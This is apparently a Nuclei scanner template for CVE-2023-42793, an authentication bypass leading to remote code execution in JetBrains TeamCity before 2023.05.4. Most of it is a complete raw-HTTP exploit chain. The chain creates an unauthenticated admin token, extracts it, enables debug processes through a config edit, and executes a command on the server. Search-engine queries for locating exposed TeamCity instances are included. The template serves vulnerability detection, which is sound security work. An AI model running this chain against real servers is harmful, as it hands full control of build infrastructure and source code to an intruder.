Description
In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
id: CVE-2023-42793
info:
name: JetBrains TeamCity < 2023.05.4 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
impact: |
Unauthenticated attackers can bypass authentication by creating admin tokens to gain full administrative access to TeamCity Server, potentially executing arbitrary code and compromising the entire CI/CD infrastructure and source code.
remediation: |
Update JetBrains TeamCity to version 2023.05.4 or later that properly validates authentication and prevents token creation through unauthenticated requests.
reference:
- https://www.jetbrains.com/privacy-security/issues-fixed/
- https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis
- https://www.sonarsource.com/blog/teamcity-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-42793
- https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-42793
cwe-id: CWE-288
epss-score: 0.99979
epss-percentile: 0.99981
cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
vendor: jetbrains
product: teamcity
shodan-query:
- title:TeamCity
- http.title:teamcity
- http.component:"teamcity"
fofa-query:
- title=TeamCity
- title=teamcity
google-query: intitle:teamcity
tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev,vkev,vuln
http:
- raw:
- |
DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Content-Type: application/x-www-form-urlencoded
- |
POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Content-Type: application/x-www-form-urlencoded
- |
POST /app/rest/debug/processes?exePath=echo¶ms={{randstr}} HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '<token name="RPC2" creationTime'
- type: word
part: body_5
words:
- 'StdOut:{{randstr}}'
extractors:
- type: regex
part: body_2
name: token
group: 1
regex:
- 'value="(.*?)"'
internal: true
# digest: 490a0046304402202134b72164d59b407625efe3395105f5e343c159cf2233e2144253055bb2db1102201a781fbbe258e9b929bc0d5bcb274d87a73097affb0fdf5568b33c08277c6130:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.